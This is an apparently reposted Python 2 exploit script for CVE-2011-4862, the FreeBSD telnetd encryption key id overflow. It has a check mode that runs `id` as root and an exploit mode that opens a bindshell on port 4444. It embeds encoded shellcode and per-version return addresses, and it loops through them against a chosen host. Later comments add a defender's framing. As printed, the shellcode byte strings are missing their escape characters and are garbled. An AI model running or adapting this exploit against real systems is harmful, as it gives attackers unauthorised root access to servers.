
FreeBSD telnetd Remote Root

Posted on 16 January 2012

#!/usr/bin/env python
# Checks/exploits CVE-2011-4862 (remote root in encryption supporting telnetd) in multiple FreeBSD versions.
# Author: Knull of http://leethack.info
# References:
# Metasploit module, http://www.metasploit.com/modules/exploit/freebsd/telnet/telnet_encrypt_keyid
# FreeBSD advisory, http://lists.freebsd.org/pipermail/freebsd-announce/2011-December/001398.html
#
# NOTE(review): this is Python 2 code (print statements, string.letters); it is
# reproduced here as published, with the page's own formatting restored. The
# byte-string literals below are kept exactly as they appear on the page.
# Defender's summary: the interesting wire artefact is a telnet ENCRYPT
# suboption (IAC SB 0x26 ...) whose ENC_KEYID body is far longer than any real
# key id; that oversized suboption is the detection signature for this CVE.
import random, string, struct, socket, time, sys


def usage():
    # Print the two supported modes: -c (runs `id` on the host to check for a
    # vulnerable, root-running telnetd) and -e (opens a bindshell on port 4444).
    print "Usage: " + sys.argv[0] + " [Option] host Options: -c check if telnetd is vulnerable and running as root (runs command `id` on host) -e exploit host (opens a bindshell on port 4444) "


# Argument handling: exactly two arguments are expected, a mode flag and a host.
# The telnet port is hard-coded to 23.
if len(sys.argv) == 3:
    host = sys.argv[2].rstrip()
    port = 23
    if sys.argv[1] == '-c':
        # slightly modified version of metasploits bsd/x86/exec:
        #
        # bsd/x86/exec - 71 bytes
        # http://www.metasploit.com
        # Encoder: x86/shikata_ga_nai
        # AppendExit=false, CMD=id, PrependSetresuid=false,
        # PrependSetuid=false, VERBOSE=false, PrependSetreuid=false
        #
        # `buf` is the payload literal as it appears on the page; it is later
        # spliced into the key id at a fixed offset (see the loop below).
        buf = "xdaxd0xb8x7bx91x45xc5xd9x74x24xf4x5dx2bxc9xb1x0cx31x45x17x03x45x17x83x96x6dxa7x30x02xb5x70x22x80xa1xadx37x24x32x27x50x76x5ax59xb0x05xf2xcdxe1xc6x60x67x77xfbx37x9fx84xfbxb7x5fxe2x9fxb7x08xa7xd6x59xe4x16xbbxc9xc4x19"
    elif sys.argv[1] == '-e':
        # slightly modified version of metasploits bsd/x86/shell_bind_tcp:
        #
        # bsd/x86/shell_bind_tcp - 100 bytes
        # http://www.metasploit.com
        # Encoder: x86/shikata_ga_nai
        # AutoRunScript=, AppendExit=false, PrependSetresuid=false,
        # InitialAutoRunScript=, PrependSetuid=false, LPORT=4444,
        # VERBOSE=false, RHOST=, PrependSetreuid=false
        buf = "xdaxc8xbex7bxd4xeax14xd9x74x24xf4x58x2bxc9xb1x13x31x70x18x83xc0x04x03x70x6fx36x1fx25x4fxe6x88xb9x4dx16x15xcfxb6x48xcfxcex52x6bx65xc1x12x0axb4x61x05x9dx16x08xc1x45x5ax4cx98x31x88xfdxf0x70xd0x4ex1ax46x51xfex72x32x08xa7xbfx42x53x18xdbx3ax5axf7x4bx92x8dx8bxe3x84xfex09x9ax3ax88x2dx0cx97xd9xe1x1cx2cx13x81"
    else:
        usage()
        exit()
else:
    usage()
    exit()

# Every socket operation below inherits this 10 s timeout, so a host that
# does not answer is skipped by the `except socket.error` in the loop.
socket.setdefaulttimeout(10)
# SystemRandom is only used for the filler bytes of the key id; nothing here
# relies on the filler being unpredictable.
rg = random.SystemRandom()
alnum = string.letters[0:52] + string.digits


def rand_alnumlst(length):
    # Return `length` random alphanumeric characters as a list of one-char
    # strings, so the caller can patch it by slice assignment.
    return list(''.join(rg.choice(alnum) for _ in range(length)))


# Telnet option negotiation bytes (IAC = 0xff, SB = 0xfa, SE = 0xf0).
# 0x26 is the ENCRYPT option (RFC 2946); per that RFC the subcommand 0x00 is
# IS and 0x07 is ENC_KEYID. The eight bytes 0x12..0x19 in enc_init are
# presumably an initial vector — not verifiable from this page.
enc_init = "xffxfax26x00x01x01x12x13x14x15x16x17x18x19xffxf0"
enc_keyid = "xffxfax26x07"
end_suboption = "xffxf0"
# ret values for multiple FreeBSD versions
# `rets` and `version` are parallel tuples indexed by `count` in the loop;
# the addresses are taken from the page and are specific to these releases.
rets = 0x0804a8a9, 0x0804a889, 0x0804a869, 0x08057bd0, 0x0804c4e0, 0x0804a5b4, 0x08052925, 0x0804cf31, 0x8059730
version = '8.2', '8.1', '8.0', '7.3/7.4', '7.0/7.1/7.2', '6.3/6.4', '6.0/6.1/6.2', '5.5', '5.3'
# display banner
print "Vulnerability checker/exploit for CVE-2011-4862 (FreeBSD telnetd encryption)"
print "by Knull, http://leethack.info "
count = 0
tried = 0
# loop through the ret's until one works
for ret in rets:
    # Build a 400-element key id and patch it at fixed offsets: a two-char
    # literal at 0, ret-20 and ret as little-endian dwords at 72 and 76,
    # fresh filler from 80, another literal at 120 and the payload at 192.
    # Note that the slices and their replacements are not the same length,
    # so the list grows as it is patched; the offsets are as published.
    key_id = rand_alnumlst(400)
    key_id[0:1] = "xebx76"
    key_id[72:75] = struct.pack('<I', ret - 20)
    key_id[76:79] = struct.pack('<I', ret)
    key_id[80:191] = rand_alnumlst(112)
    key_id[120:121] = "xebx46"
    key_id[192:191+len(buf)] = buf
    # Flatten the list of strings back into one string (equivalent to
    # ''.join(key_id); kept as written).
    s = ''
    for i in key_id:
        s += ''.join(i)
    # The whole oversized ENC_KEYID suboption — this is what an IDS rule for
    # the CVE should key on.
    sploit = enc_keyid + s + end_suboption
    print "Trying FreeBSD " + version[count] + "... "
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((host, port))
        # Handshake order matters: ENCRYPT IS first, then the key id twice.
        sock.send(enc_init)
        data = sock.recv(32)
        sock.send(sploit)
        data = sock.recv(32)
        time.sleep(0.5)
        if data:
            sock.send(sploit)
            time.sleep(0.5)
            if sys.argv[1] == '-e':
                tried = 1
                sock.close()
            elif sys.argv[1] == '-c':
                # Check mode reads the output of `id`; a "root" substring is
                # taken as confirmation and the script stops at this ret.
                result = sock.recv(128)
                sock.close()
                if result.find("root") != -1:
                    print host + " is vulnerable, result of command: id " + result
                    exit()
        sock.close()
    except socket.error:
        # Timeouts and refused/reset connections are treated as "this ret
        # did not work"; the socket is not explicitly closed on this path.
        pass
    count+=1
if tried:
    print "Sent payloads, check bindshell on " + host + ", port 4444 "

 
